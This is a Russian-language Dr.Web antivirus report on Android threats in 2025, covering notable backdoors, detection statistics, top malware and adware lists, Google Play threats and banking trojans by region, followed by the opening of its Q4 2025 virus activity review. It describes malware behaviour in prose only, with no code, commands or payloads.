Android.Spy.1292.origin передавал киберпреступникам данные об учетных записях и номере мобильного телефона, контакты из телефонной книги, геолокацию устройства и сведения о хранящихся на нем файлах. Троян мог похищать определенные файлы по команде атакующих. Тех интересовали конфиденциальные документы, которые пользователи отправляли через популярные мессенджеры, а также файл журнала локаций приложения Alpine Quest.

В августе мы рассказали о случаях распространения бэкдора Android.Backdoor.916.origin через личные сообщения в популярных мессенджерах. Атакующие предлагали потенциальным жертвам установить «антивирус» из прикрепленного к сообщениям APK-файла, в котором на самом деле и скрывалась вредоносная программа. Наша антивирусная лаборатория обнаружила первые версии Android.Backdoor.916.origin в январе 2025 года и с момента обнаружения отслеживала его активность, что и позволило оперативно выявить данную кампанию.

Android.Backdoor.916.origin вводит пользователей в заблуждение, имитируя работу антивируса

После установки на Android-устройство Android.Backdoor.916.origin позволяет похищать конфиденциальную информацию и следить за пользователем. Например, с помощью бэкдора злоумышленники могут прослушивать разговоры, передавать трансляцию с камеры, отслеживать местоположение и красть содержимое из мессенджеров и браузеров. Кроме того, Android.Backdoor.916.origin реализует функциональность кейлоггера для перехвата вводимого текста, в том числе — паролей. По оценкам наших специалистов, бэкдор применяется в таргетированных атаках и не предназначен для массового распространения. Основной целью для киберпреступников являются сотрудники российских компаний.

В октябре «Доктор Веб» опубликовал сведения о многофункциональном бэкдоре Android.Backdoor.Baohuo.1.origin, который наши вирусные аналитики обнаружили в модифицированных версиях мессенджера Telegram X. Основным источником его распространения стали вредоносные сайты, куда потенциальные жертвы попадают через рекламу в мобильных приложениях. На этих сайтах пользователям предлагается установить Telegram X — якобы для поиска партнера для общения и свиданий. При этом такие интернет-ресурсы в большей степени ориентированы на жителей Индонезии и Бразилии. В то же время мы выявили этот бэкдор и в ряде сторонних каталогов Android-приложений.

Пример вредоносного сайта, с которого загружалась троянская версия Telegram X

Одной из задач Android.Backdoor.Baohuo.1.origin является кража конфиденциальных данных. Например, вредоносная программа похищает логин и пароль от учетной записи Telegram жертвы, историю переписки в мессенджере, входящие СМС, контакты из телефонной книги устройства, а также способна перехватывать содержимое буфера обмена. Однако злоумышленники используют ее не только в качестве шпионского приложения. С помощью Android.Backdoor.Baohuo.1.origin они фактически могут управлять взломанной учетной записью и контролировать работу Telegram X, изменяя его функциональность. Так, бэкдор позволяет незаметно добавлять пользователя и удалять его из Telegram-каналов, вступать от его лица в чаты и скрывать устройства, авторизованные для его учетной записи. Для выполнения действий, которые требуют вмешательства в логику работы приложения, используется фреймворк Xposed. Киберпреступники управляют бэкдором как традиционным способом — через C2-сервер, так и путем отправки команд через базу данных Redis, что ранее не встречалось в других вредоносных программах для ОС Android. Общее число устройств, зараженных Android.Backdoor.Baohuo.1.origin, превысило 58 000. При этом были затронуты около 3 000 различных моделей смартфонов, планшетов, ТВ-приставок и даже автомобилей с бортовыми компьютерами на базе Android.

Страны с наибольшим числом устройств, зараженных Android.Backdoor.Baohuo.1.origin

Статистика

По данным статистики детектирований Dr.Web Security Space для мобильных устройств, в 2025 году самыми распространенными Android-угрозами стали различные вредоносные программы — пользователи сталкивались с ними в 81,11% случаев. Следом с долей 10,73% расположились потенциально опасные приложения. Третье место заняли рекламные программы, которые обнаруживались в 5,89% случаев. Наименьшая активность наблюдалась со стороны нежелательного ПО: на него пришлось 2,27% детектирований.

По сравнению с годом ранее, доля вредоносных и потенциально опасных программ возросла, в то время как доля нежелательного и рекламного ПО снизилась.

Вредоносные приложения

На протяжении нескольких лет рекламные трояны семейства Android.HiddenAds остаются лидерами по числу детектирований вредоносного ПО. В 2025 году ситуация не изменилась, однако за прошедшие 12 месяцев их доля несколько сократилась — с 31,95% до 27,42%.

Эти трояны показывают навязчивую рекламу в виде полноэкранных баннеров и видеороликов. Чтобы пользователям было сложнее обнаружить и удалить вредоносные программы с зараженных устройств, после установки они пытаются «спрятаться», например, скрывая или подменяя свои значки в меню главного экрана.

Самым активным представителем семейства оказался Android.HiddenAds.657.origin — на него пришлось более трети детектирований. Троян попал в поле зрения наших вирусных аналитиков еще в 2024 году и за это время выбился в лидеры. Он является одним из множества вариантов Android.HiddenAds.1994 — вредоносной программы, известной с 2021 года. Распространение получили и несколько ее новых версий — например, Android.HiddenAds.666.origin и Android.HiddenAds.673.origin. Нельзя исключать, что со временем они также могут подняться на верхние строчки, как это ранее случалось с другими модификациями Android.HiddenAds.1994.

В течение года пользователи вновь сталкивались с подсемейством Android.HiddenAds, Aegis, однако доля таких вредоносных программ от общего числа детектирований семейства заметно сократилась — с 17,37% до 3,11%. Эти трояны отличаются, в том числе, способностью запускаться автоматически после установки. Среди них самыми активными стали варианты Android.HiddenAds.Aegis.1 и Android.HiddenAds.Aegis.8.origin.

Вторым по распространенности вредоносным ПО оказались рекламные трояны Android.MobiDash, доля которых по сравнению с 2024 годом увеличилась с 5,38% до 15,64%. Среди них лидировал Android.MobiDash.7859. За ними расположились программы-подделки Android.FakeApp, которые используются в мошеннических целях и вместо обещанной функциональности загружают различные сайты. На них пришлось 10,94% детектирований. Это ниже показателя 2024 года, когда их доля составляла 18,28%. Такое снижение произошло, в том числе, за счет меньшей активности трояна Android.FakeApp.1600, однако он все еще остается самым распространенным представителем семейства. Его главной задачей является загрузка сайтов онлайн-казино.

Доля троянских программ семейства Android.Spy, реализующих различную шпионскую функциональность, сократилась с 11,52% до 3,09%. В то же время повысилась активность банковских троянов. Их доля от общего числа детектирований вредоносных приложений составила 6,94% против показателя 6,29% годом ранее.

В 2025 году с 5,49% до 6,01% увеличилось число детектирований программных упаковщиков, которые могут использовать, в том числе, и злоумышленники с целью защиты ВПО от обнаружения и анализа. Чаще всего на защищаемых устройствах выявлялись вредоносные программы с упаковщиком Android.Packed.57146.

Распространение получили различные вредоносные моды мессенджера WhatsApp. Среди них были модификации (Dr.Web детектирует их как Android.Click.1812), загружающие веб-сайты незаметно для жертв. Также наблюдалась возросшая активность многофункциональных троянов семейства Android.Triada, которые злоумышленники могут внедрять в прошивку Android-устройств. Их доля возросла с 2,74% до 7,48%.

Десять наиболее часто детектируемых вредоносных Android-приложений в 2025 году:

Android.HiddenAds.657.origin
Android.HiddenAds.4214
Android.HiddenAds.655.origin
Android.HiddenAds.4213
Android.HiddenAds.666.origin: Троянские программы для показа навязчивой рекламы. Представители этого семейства часто распространяются под видом безобидных приложений и в некоторых случаях устанавливаются в системный каталог другим вредоносным ПО. Попадая на Android-устройства, такие рекламные трояны обычно скрывают от пользователя свое присутствие в системе — например, «прячут» значок приложения из меню главного экрана.
Android.MobiDash.7859: Троянская программа, показывающая надоедливую рекламу. Она представляет собой программный модуль, который разработчики ПО встраивают в приложения.
Android.FakeApp.1600: Троянская программа, которая загружает указанный в ее настройках веб-сайт. Известные модификации этого вредоносного приложения загружают сайт онлайн-казино.
Android.Click.1812: Детектирование вредоносных модов мессенджера WhatsApp, которые незаметно для пользователя могут загружать различные сайты в фоновом режиме.
Android.Packed.57146: Детектирование вредоносных приложений, которые упакованы с помощью популярного коммерческого обфускатора кода.
Android.Triada.5847: Детектирование упаковщика для троянов семейства Android.Triada, предназначенного для их защиты от анализа и обнаружения. Чаще всего злоумышленники используют его совместно с вредоносными модами мессенджера Telegram, в которые непосредственно встроены эти трояны.

Нежелательное ПО

Наиболее распространенным нежелательным ПО в 2025 году вновь стали приложения Program.FakeMoney.11, на которые пришлось 51,96% детектирований. Они предлагают пользователям за вознаграждение выполнять те или иные задания и якобы в дальнейшем позволяют конвертировать награду в настоящие деньги. На самом деле никаких выплат в итоге не происходит. Вместе с Program.FakeMoney.11 распространение получили и другие аналогичные программы, например — Program.FakeMoney.14 и Program.FakeMoney.16, однако с ними пользователи сталкивались значительно реже.

На втором месте с показателем 10,37% расположились программы Program.FakeAntiVirus.1, которые имитируют работу антивирусов и обнаруживают несуществующие угрозы. Для «лечения» заражения они предлагают приобрести полную версию ПО.

Приложения Program.CloudInject.1, которые модифицируются в облачном сервисе CloudInject, с долей 6,41% стали третьими по распространенности. Их варианты, детектируемые как Program.CloudInject.5, с показателем 5,08% оказались рядом с ними на четвертой позиции. Изменения в такие программы вносятся непосредственно на удаленном сервере, а доступ к сервису предоставляет утилита Tool.CloudInject, которая является лишь оболочкой для работы с ним. При модификации к программам добавляются опасные системные разрешения и обфусцированный код. Кроме того, через сервис CloudInject моддеры способны дистанционно управлять модифицированными приложениями, например, заблокировать их и потребовать ввести код для дальнейшего использования.

В 2025 году наблюдался незначительный рост числа детектирований ряда программ, которые могут применяться для наблюдения за пользователями и контроля их активности. В руках злоумышленников такие инструменты превращаются в шпионское ПО. Так, доля приложения Program.TrackView.1.origin и его варианта Program.TrackView.2.origin увеличилась с 2,40% до 2,91% и с 0,21% до 0,97% соответственно. Доля Program.SecretVideoRecorder.1.origin возросла c 2,03% до 2,56%, а его модификации Program.SecretVideoRecorder.2.origin — с 0,90% до 1,02%. Показатель программы Program.SnoopPhone.1.origin увеличился с 0,31% до 1,01%.

Десять наиболее часто детектируемых нежелательных приложений в 2025 году:

Program.FakeMoney.11
Program.FakeMoney.14: Детектирование приложений, якобы позволяющих зарабатывать на выполнении тех или иных действий или заданий. Эти программы имитируют начисление вознаграждений, причем для вывода «заработанных» денег требуется накопить определенную сумму. Обычно в них имеется список популярных платежных систем и банков, через которые якобы возможно перевести награды. Но даже когда пользователям удается накопить достаточную для вывода сумму, обещанные выплаты им не поступают. Этой записью также детектируется другое нежелательное ПО, основанное на коде таких программ.
Program.FakeAntiVirus.1: Детектирование рекламных программ, которые имитируют работу антивирусного ПО. Такие программы могут сообщать о несуществующих угрозах и вводить пользователей в заблуждение, требуя оплатить покупку полной версии.
Program.CloudInject.1
Program.CloudInject.5: Детектирование Android-приложений, модифицированных при помощи облачного сервиса CloudInject и одноименной Android-утилиты (добавлена в вирусную базу Dr.Web как Tool.CloudInject). Такие программы модифицируются на удаленном сервере, при этом заинтересованный в их изменении пользователь (моддер) не контролирует, что именно будет в них встроено. Кроме того, приложения получают набор опасных разрешений. После модификации программ у моддера появляется возможность дистанционно управлять ими — блокировать, показывать настраиваемые диалоги, отслеживать факт установки и удаления другого ПО и т. д.
Program.TrackView.1.origin
Program.TrackView.2.origin: Детектирование приложения, позволяющего вести наблюдение за пользователями через Android-устройства. С помощью этой программы злоумышленники могут определять местоположение целевых устройств, использовать камеру для записи видео и создания фотографий, выполнять прослушивание через микрофон, создавать аудиозаписи и т. д.
Program.SecretVideoRecorder.1.origin
Program.SecretVideoRecorder.2.origin: Детектирование различных версий приложения для фоновой фото- и видеосъемки через встроенные камеры Android-устройств. Эта программа может работать незаметно, позволяя отключить уведомления о записи, а также изменять значок и описание приложения на фальшивые. Такая функциональность делает ее потенциально опасной.
Program.SnoopPhone.1.origin: Программа для наблюдения за владельцами Android-устройств. Она позволяет читать СМС, получать информацию о телефонных вызовах, отслеживать местоположение и выполнять аудиозапись окружения.

Потенциально опасные программы

В 2025 году самым распространенным потенциально опасным ПО стали программы, модифицированные при помощи инструмента NP Manager. Это утилита для модификации приложений, которая содержит различные модули для обфускации и защиты кода программ, а также обхода проверки их цифровой подписи после модификации. Злоумышленники часто применяют ее для защиты вредоносных приложений, чтобы затруднить их детектирование антивирусами. Доля таких программ по сравнению с 2024 годом возросла с 24,52% до 53,59%, и на них пришлось уже более половины детектирований потенциально опасного ПО. Чаще всего на защищаемых устройствах встречались варианты Tool.NPMod.3 (32,85%), Tool.NPMod.1 (12,61%), Tool.NPMod.1.origin (3,02%) и Tool.NPMod.4 (2,31%).

С 3,93% до 8,11% возросло количество детектирований Tool.Androlua — ряда фреймворков, созданных для разработки Android-приложений на языке программирования Lua. Они требуют множество системных разрешений, включая использование службы специальных возможностей Android. Созданные с их помощью программы построены на Lua-скриптах, которые зашифрованы и расшифровываются только непосредственно перед исполнением. Такие скрипты потенциально могут быть вредоносными. С 8,16% до 10,06% увеличилась доля приложений, модифицированных при помощи утилиты Tool.LuckyPatcher. Этот инструмент модифицирует установленные программы, загружая из интернета специально подготовленные скрипты.

В то же время доля утилит Tool.SilentInstaller, которые позволяют запускать Android-приложения без их установки, снизилась с 33,10% до 10,55%. Самыми распространенными вариантами семейства в 2025 году стали Tool.SilentInstaller.14.origin (4,66%), Tool.SilentInstaller.6.origin (2,07%) и Tool.SilentInstaller.7.origin (1,88%). Кроме того, с 13,17% до 2,58% уменьшилась доля программ, защищенных упаковщиком Tool.Packer.1.origin.

Десять наиболее распространенных потенциально опасных приложений, обнаруженных на Android-устройствах в 2025 году:

Tool.NPMod.3
Tool.NPMod.1
Tool.NPMod.1.origin
Tool.NPMod.4: Детектирование Android-приложений, модифицированных при помощи утилиты NP Manager. Эта утилита содержит модули для обфускации и защиты кода программ, а также обхода проверки их цифровой подписи после модификации. Добавляемая ей обфускация часто используется во вредоносном ПО для затруднения его детектирования и анализа.
Tool.Androlua.1.origin: Детектирование ряда потенциально опасных версий специализированного фреймворка для разработки Android-программ на скриптовом языке программирования Lua. Основная логика Lua-приложений расположена в соответствующих скриптах, которые зашифрованы и расшифровываются интерпретатором перед выполнением. Часто данный фреймворк по умолчанию запрашивает доступ ко множеству системных разрешений для работы, в том числе для использования сервиса специальных возможностей ОС Android. В результате исполняемые через него Lua-скрипты способны выполнять различные вредоносные действия в соответствии с полученными разрешениями.
Tool.LuckyPatcher.2.origin
Tool.LuckyPatcher.1.origin: Утилита, позволяющая модифицировать установленные Android-приложения (создавать для них патчи) с целью изменения логики их работы или обхода тех или иных ограничений. Например, с ее помощью пользователи могут попытаться отключить проверку root-доступа в банковских программах или получить неограниченные ресурсы в играх. Для создания патчей утилита загружает из интернета специально подготовленные скрипты, которые могут создавать и добавлять в общую базу все желающие. Функциональность таких скриптов может оказаться в том числе и вредоносной, поэтому создаваемые патчи могут представлять потенциальную опасность.
Tool.SilentInstaller.14.origin: Потенциально опасная программная платформа, которая позволяет приложениям запускать APK-файлы без их установки. Она создает виртуальную среду исполнения, которая не затрагивает основную операционную систему.
Tool.Packer.1.origin: Специализированная утилита-упаковщик для защиты Android-приложений от модификации и обратного инжиниринга. Она не является вредоносной, но может использоваться для защиты как безобидных, так и троянских программ.

Рекламные приложения

Среди рекламного ПО наибольшее распространение в 2025 году получили сторонние модификации приложения WhatsApp, детектируемые как Adware.ModAd.1. В такие модификации внедрена функциональность по открытию ссылок при работе с мессенджером. С этих ссылок выполняется перенаправление на рекламируемые сайты. По сравнению с 2024 годом доля Adware.ModAd.1 от общего числа рекламных приложений, обнаруженных на защищаемых устройствах, снизилась с 47,45% до 26,90%.

Встраиваемые в Android-программы модули Adware.Adpush, которые демонстрируют рекламные уведомления, расположились на втором месте, за год увеличив активность с 14,76% до 26,19%. Третье место с показателем 8,88% заняли представители семейства Adware.Basement, доля которых по сравнению с годом ранее осталась практически неизменной. Такие программы могут показывать рекламу, которая ведет на вредоносные сайты.

Распространение также получили семейства рекламных приложений Adware.Airpush (число детектирований возросло с 4,35% до 5,14%), Adware.Fictus (рост с 3,29% до 6,21%), Adware.Youmi (рост с 1,62% до 2,91%) а также Adware.Leadbolt (рост с 2,26% до 2,41%) и Adware.Jiubang (рост с 1,70% до 2,38%).

Десять наиболее распространенных рекламных приложений, обнаруженных на Android-устройствах в 2025 году:

Adware.ModAd.1: Детектирование некоторых модифицированных версий (модов) мессенджера WhatsApp, в функции которых внедрен код для загрузки заданных ссылок через веб-отображение во время работы с мессенджером. С этих интернет-адресов выполняется перенаправление на рекламируемые сайты — например, онлайн-казино и букмекеров, сайты для взрослых.
Adware.AdPush.3.origin
Adware.Adpush.21846
Adware.AdPush.39.origin: Рекламные модули, которые могут быть интегрированы в Android-программы. Они демонстрируют рекламные уведомления, вводящие пользователей в заблуждение. Например, такие уведомления могут напоминать сообщения от операционной системы. Кроме того, эти модули собирают ряд конфиденциальных данных, а также способны загружать другие приложения и инициировать их установку.
Adware.Basement.1: Приложения, демонстрирующие нежелательную рекламу, которая часто ведет на вредоносные и мошеннические сайты. Они имеют общую кодовую базу с нежелательными программами Program.FakeMoney.11.
Adware.Fictus.1.origin: Рекламный модуль, который злоумышленники встраивают в версии-клоны популярных Android-игр и программ. Его интеграция в программы происходит при помощи специализированного упаковщика net2share. Созданные таким образом копии ПО распространяются через различные каталоги приложений и после установки демонстрируют нежелательную рекламу.
Adware.Airpush.7.origin: Программные модули, встраиваемые в Android-приложения и демонстрирующие разнообразную рекламу. В зависимости от версии и модификации это могут быть рекламные уведомления, всплывающие окна или баннеры. С помощью данных модулей злоумышленники часто распространяют вредоносные программы, предлагая установить то или иное ПО. Кроме того, такие модули передают на удаленный сервер различную конфиденциальную информацию.
Adware.Youmi.4: Детектирование нежелательного рекламного модуля, который размещает рекламные ярлыки на главном экране Android-устройств.
Adware.Jiubang.1: Нежелательное рекламное ПО для Android-устройств, которое при установке приложений демонстрирует баннер с рекомендуемыми к установке программами.
Adware.Inmobi.1: Детектирование некоторых версий рекламного SDK Inmobi, способных совершать телефонные звонки и добавлять события в календарь Android-устройств.

Угрозы в Google Play

В 2025 году антивирусная лаборатория компании «Доктор Веб» обнаружила в каталоге Google Play более 180 вредоносных, нежелательных и рекламных программ, которые суммарно были установлены по меньшей мере 2 165 040 раз. Среди них были различные модификации троянов Android.HiddenAds.4213 и Android.HiddenAds.4215, которые скрывали присутствие на зараженных устройствах и демонстрировали рекламу поверх интерфейса операционной системы и других приложений. Эти трояны распространялись под видом фоторедакторов, программ для фото- и видеосъемки и другого ПО.

Программы Time Shift Cam и Fusion Collage Editor были рекламными троянами Android.HiddenAds

Под видом официального ПО криптобиржи Dydx и блокчейн-платформ Raydium и Aerodrome Finance киберпреступники распространяли трояны Android.CoinSteal.202, Android.CoinSteal.203 и Android.CoinSteal.206, похищавших криптовалюту.

В программах Raydium и Dydx Exchange скрывалось троянское ПО для кражи криптовалюты

Эти вредоносные приложения предлагали пользователям ввести мнемоническую фразу якобы для подключения криптокошелька, однако на самом деле вводимые данные отправлялись злоумышленникам. Чтобы еще больше ввести потенциальных жертв в заблуждение, формы для ввода мнемонических фраз могли быть замаскированы под запросы от других криптоплатформ.

Android.CoinSteal.206 демонстрирует фишинговую форму якобы от имени криптобиржи PancakeSwap и запрашивает мнемоническую фразу для доступа к криптокошельку

В течение года наши специалисты выявили в Google Play более 80 вредоносных приложений семейства Android.Joker, подписывающих пользователей на платные услуги. Они распространялись под видом различного ПО, включая мессенджеры, программы для фотосъемки, системные утилиты, редакторы изображений и программы для работы с документами.

Примеры выявленных троянов Android.Joker: Android.Joker.2494 распространялся в виде мессенджера File Text Messages, а Android.Joker.2496 — под видом утилиты Useful Cleaner для оптимизации работы смартфона

Киберпреступники вновь распространяли всевозможные программы-подделки Android.FakeApp, которые применяются в различных мошеннических схемах. Их основной задачей является загрузка целевых веб-страниц. Часть этих троянов злоумышленники выдавали за ПО финансовой тематики. Такие программы загружали мошеннические сайты, якобы связанные с инвестициями и онлайн-заработком, а также фишинговые сайты. Другие программы-подделки Android.FakeApp распространялись под видом игр и при определенных условиях могли загружать сайты онлайн-казино и букмекеров. В общей сложности мы зафиксировали более 100 таких программ в Google Play.

Примеры приложений-подделок Android.FakeApp. Троян Android.FakeApp.1863, который скрывался в программе TPAO, был ориентирован на турецких пользователей и предлагал им управлять депозитами и доходами. А троян Android.FakeApp.1840 распространялся в виде игры Pino Bounce и мог загружать сайт онлайн-казино

Вирусные аналитики «Доктор Веб» также обнаружили новое нежелательное рекламное ПО Adware.Adpush.21912, которое скрывалось в программе Coin News Promax с информацией о криптовалютах. Adware.Adpush.21912 демонстрирует уведомления, при нажатии на которые в WebView загружается заданная C2-сервером ссылка.

Приложение Coin News Promax из Google Play являлось рекламным ПО Adware.Adpush.21912

Кроме того, наши специалисты выявили нежелательную программу Program.FakeMoney.16, которая распространялась в виде приложения Zeus Jackpot Mania. Пользователи в игровой форме получали в нем виртуальные награды, которые затем якобы могли конвертировать в настоящие деньги и вывести из приложения.

Программа Zeus Jackpot Mania представляла собой нежелательное приложение Program.FakeMoney.16

Для «вывода» денег программа запрашивала ряд данных, однако никаких выплат пользователи не получали.

Program.FakeMoney.16 просит указать полное имя пользователя и сведения об учетной записи банка

Банковские трояны

По данным статистики детектирований Dr.Web Security Space для мобильных устройств в 2025 году доля банковских троянов от общего числа зафиксированных вредоносных программ составила 6,94%, что чуть выше значения 6,29% годом ранее. В течение первых трех месяцев активность банковских троянов оставалась примерно на одном уровне, однако уже в начале II квартала заметно возросла. Далее она начала постепенно снижаться, достигнув годового минимума в июле. С августа число детектирований вновь стало расти и уже в октябре достигло пика. В конце года наблюдалось очередное снижение.

В 2025 году злоумышленники по-прежнему использовали ряд популярных семейств банковских троянов в проводимых атаках. Среди наиболее активных были вредоносные программы Android.Banker.Mamont, Coper, Android.BankBot.Ermac и ряд других. Кроме того, были выявлены новые версии троянов NGate, которые используют технологию NFC для кражи денег. Эти вредоносные программы передают злоумышленникам данные с NFC-чипа зараженных устройств, позволяя мошенникам без дальнейшего вовлечения пользователей снимать деньги со счетов жертв в банкоматах или совершать покупки с использованием бесконтактной оплаты. Среди наиболее активных были такие модификации как Android.Banker.NGate.8, Android.Banker.NGate.17, Android.Banker.NGate.5.origin.

Продолжилось распространение Android.SpyMax — вредоносных приложений со шпионской функциональностью, основанных на ставшем общедоступным исходном коде RAT-трояна SpyNote. Киберпреступники используют их, в том числе, и в качестве банковских троянов. Вместе с тем активность Android.SpyMax по сравнению с 2024 годом снизилась. На долю этих вредоносных приложений пришлось 12,35% детектирований банковских троянов против показателя 32,04% годом ранее.

В 2025 году российские пользователи чаще всего сталкивались с различными банковскими троянами, которые по классификации компании «Доктор Веб» входят в обширное семейство Mamont (Android.Banker.790.origin, Android.Banker.Mamont.3.origin, Android.Banker.Mamont.28.origin). Оно включает разнообразные вредоносные приложения, которые вирусописатели продолжают активно модифицировать и развивать. Эти программы перехватывают СМС с одноразовыми кодами от кредитных организаций и похищают данные банковских карт и другую конфиденциальную информацию.

В течение года наши специалисты отмечали активность банковских троянов, нацеленных на жителей Узбекистана и сопредельных с ним государств, включая Армению, Азербайджан и Киргизию. Чаще всего на защищаемых устройствах детектировались Android.Banker.951.origin, Android.Banker.881.origin и Android.Banker.963.origin, крадущие проверочные СМС-коды от кредитных организаций. Киберпреступники постоянно модифицируют такие вредоносные приложения, чтобы усложнить их выявление. Турецких пользователей наиболее часто атаковали банковские трояны Android.BankBot.Coper.12.origin, Android.Banker.5685 и Android.Banker.864.origin, также способные похищать содержимое СМС-сообщений.

В то же время жители Ирана столкнулись с троянами Android.BankBot.1190.origin, Android.BankBot.1191.origin и их модификациями. Эти вредоносные программы крадут банковскую информацию из СМС-сообщений: находят в них данные о банковских картах, счетах жертвы, количестве доступных денег, выполненных транзакциях и т. д., после чего отправляют их злоумышленникам. Они также собирают информацию о контактах из телефонной книги и способны отправлять СМС по команде атакующих.

Жителей многих стран Юго-Восточной Азии и Азиатско-Тихоокеанского региона, в том числе Индонезии и Южной Кореи, атаковал троян Android.BankBot.Remo.1.origin. Эта вредоносная программа использует специальные возможности (Accessibility Services) для кражи данных из установленных на зараженных устройствах приложений банков и криптокошельков. Помимо трояна Remo, южнокорейские пользователи также сталкивались с троянами Android.BankBot.15140, Android.BankBot.Ermac.6.origin и GoldDigger (Android.BankBot.GoldDigger.9, Android.BankBot.GoldDigger.11).

Вредоносные программы GoldDigger применялись и против индонезийских и тайских пользователей. А банковский троян Android.BankBot.Gigabud.1.origin использовался против клиентов кредитных организаций Индонезии и Малайзии. В то же время злоумышленники продолжили применять троянов MoqHao при атаках на японскую аудиторию. Распространение получили такие модификации MoqHao как Android.Banker.672.origin, Android.Banker.5063, Android.Banker.740.origin и ряд других.

Одним из банковских троянов, нацеленных на жителей Индии, стал Android.Banker.6209. Троян имитирует внешний вид настоящих банковских приложений с целью кражи данных пользователей — их имен, номеров банковских карт и CVV-кодов безопасности. Кроме того, он использует зараженные устройства для скрытой добычи криптовалюты Monero. Распространение вновь получили банковские трояны RewardSteal, такие как Android.Banker.814.origin, Android.Banker.913.origin и Android.Banker.5132. Для кражи банковских данных они маскируются под ПО, якобы имеющее отношение к индийским кредитным организациям — например, ICICI, SBI, Axis и PM Kisan.

Бразильских владельцев Android-устройств чаще всего атаковали вредоносные программы Android.BankBot.1183.origin, а также ряд представителей семейства NGate — Android.Banker.NGate.8, Android.Banker.NGate.9 и Android.Banker.NGate.14.

В 2025 году вирусописатели продолжили использовать различные техники защиты банковских Android-троянов от анализа и детектирования. Например, распространение получили всевозможные методы обфускации и сокрытия кода, такие как DEX to C (конвертация исполняемого DEX-кода в код языка C), а также обфускация вредоносных приложений при помощи инструмента NP Manager.

Популярными остались техники манипуляции с форматом ZIP-архивов, которыми фактически являются APK-файлы Android-приложений. Среди них — манипуляция с полями compression method и compressed size в структуре заголовка локального файла внутри APK, а также использование некорректных данных о диске в записи ECDR и CD. Подробнее о них мы рассказывали в прошлом обзоре в разделе о банковских троянах. После таких манипуляций троянские программы остаются полностью работоспособными, но многие инструменты статического анализа воспринимают их как поврежденные и неспособны обработать корректно.

Вирусописатели стали активнее применять программы-дропперы для сокрытия основной полезной нагрузки, например, для обхода внутренней защиты каталога Google Play. Киберпреступники также используют ИИ-ассистентов при написании кода банковских троянов, что упрощает их разработку и ведет к появлению новых семейств. Кроме того, злоумышленники чаще используют Telegram-боты для управления банковскими троянами и эксфильтрации данных с зараженных устройств.

Перспективы и тенденции

В 2025 году мы наблюдали высокую активность рекламных троянов, которые остаются самыми распространенными угрозами для ОС Android. Широкое распространение вновь получили и различные программы-подделки, которые используются в мошеннических целях, в том числе — для фишинга и кражи денег. Кроме того, продолжился рост числа атак с использованием банковских троянов. Все эти вредоносные приложения являются источником нелегального дохода для киберпреступников, поэтому их популярность остается на высоком уровне. В следующем году они с высокой долей вероятности вновь станут одними из популярных инструментов заработка злоумышленников. При этом вирусописатели все чаще используют Telegram-боты для управления банковскими троянами. Эта тенденция, скорее всего, продолжится.

Появление вредоносной программы Android.Clipper.31, а также новых версий троянов Android.Vo1d и Android.Triada в прошивках смартфонов и TV-приставок говорит о сохраняющемся интересе злоумышленников в распространении вредоносного ПО способами, которые значительно усложняют его обнаружение. Весьма вероятно, что в новом году тенденция сохранится, и мы увидим новые случаи предустановки вредоносных приложений на смартфоны, ТВ-приставки и другие типы Android-устройств.

Следует также ожидать появления более сложных вредоносных программ, способных выполнять широкий спектр задач. Среди них могут быть очередные бэкдоры и различные трояны-шпионы. Кроме того, вирусописатели наверняка вновь будут использовать официальные каталоги программ, в том числе Google Play, для размещения в них вредоносного и нежелательного ПО.

Злоумышленники также продолжат внедрять различные способы защиты для создаваемых ими инструментов. Также они будут чаще использовать ИИ-помощников при написании кода, в результате чего стоит ожидать появления большего числа новых семейств.

Компания «Доктор Веб» следит за ландшафтом угроз в мобильном сегменте и оперативно реагирует на возникающие вызовы. Пользователям Android мы рекомендуем установить Dr.Web Security Space для мобильных устройств, чтобы защитить себя от вредоносных и других опасных программ.

Индикаторы компрометации

«Доктор Веб»: обзор вирусной активности в IV квартале 2025 года

Mon, 12 Jan 2026 00:00:00 GMT

12 января 2026 года

Согласно статистике детектирований антивируса Dr.Web, в IV квартале 2025 года общее число обнаруженных угроз увеличилось на 16,05% по сравнению с III кварталом. Число уникальных угроз при этом снизилось на 1,13%. Наибольшее распространение получили нежелательные рекламные приложения, вредоносные скрипты и различные вредоносные программы, в том числе загрузчики и рекламные трояны.

В почтовом трафике чаще всего детектировались троянские приложения, среди которых были загрузчики, похитители паролей и дропперы. Кроме того, через электронные письма распространялись эксплойты, бэкдоры и всевозможные вредоносные скрипты.

Пользователи, чьи файлы были затронуты троянами-шифровальщиками, чаще всего сталкивались с энкодерами Trojan.Encoder.35534, Trojan.Encoder.41868 и Trojan.Encoder.29750.

В октябре мы рассказали о бэкдоре для Android-устройств Android.Backdoor.Baohuo.1.origin, которого киберпреступники распространяют в составе модифицированных версий мессенджера Telegram X. Эта вредоносная программа похищает логины и пароли от учетных записей Telegram и другие конфиденциальные данные. С ее помощью вирусописатели могут управлять взломанными аккаунтами жертв и полностью контролировать сам мессенджер, выполняя различные действия от имени пользователей.

В ноябре наша антивирусная лаборатория опубликовала исследование таргетированной атаки, совершенной хакерской группировкой Cavalry Werewolf на российское государственное учреждение. В ходе проведенной экспертизы специалисты «Доктор Веб» выявили множество вредоносных инструментов злоумышленников, в том числе инструменты с открытым исходным кодом, которые киберпреступники применяют в своих кампаниях. Были также изучены особенности группировки и характерные для нее действия внутри скомпрометированных сетей.

Уже в декабре на нашем сайте вышел материал об уникальном трояне Trojan.ChimeraWire, который «накручивает» популярность сайтов и для этого притворяется человеком, чтобы его действия не заблокировала антибот-защита интернет-площадок. Вредоносная программа самостоятельно ищет нужные сайты в поисковых системах, открывает их и выполняет клики на веб-страницах в соответствии с получаемыми от злоумышленников параметрами. Trojan.ChimeraWire попадает на компьютеры в результате работы нескольких вредоносных приложений, которые эксплуатируют уязвимости класса DLL Search Order Hijacking, а также используют антиотладочные приемы, чтобы избежать обнаружения.

В течение IV квартала интернет-аналитики «Доктор Веб» зафиксировали новые мошеннические сайты, которые сулили потенциальным жертвам быстрый и легкий заработок. Также были выявлены очередные фишинговые интернет-ресурсы и поддельные сайты маркетплейсов.

Наши специалисты обнаружили очередные вредоносные программы в каталоге Google Play. Среди них трояны Android.Joker, которые подписывают владельцев Android-устройств на платные услуги, а также вредоносные приложения Android.FakeApp, которые злоумышленники используют в различных мошеннических схемах. В то же время статистика детектирований Dr.Web Security Space для мобильных устройств показала рост активности банковских троянов для платформы Android.

Главные тенденции IV квартала

Увеличение числа угроз, детектируемых на защищаемых устройствах
Снижение числа уникальных угроз, использованных при атаках
Рост количества запросов на расшифровку файлов, затронутых троянскими программами-шифровальщиками
Возросшая активность банковских троянов, нацеленных на владельцев Android-устройств
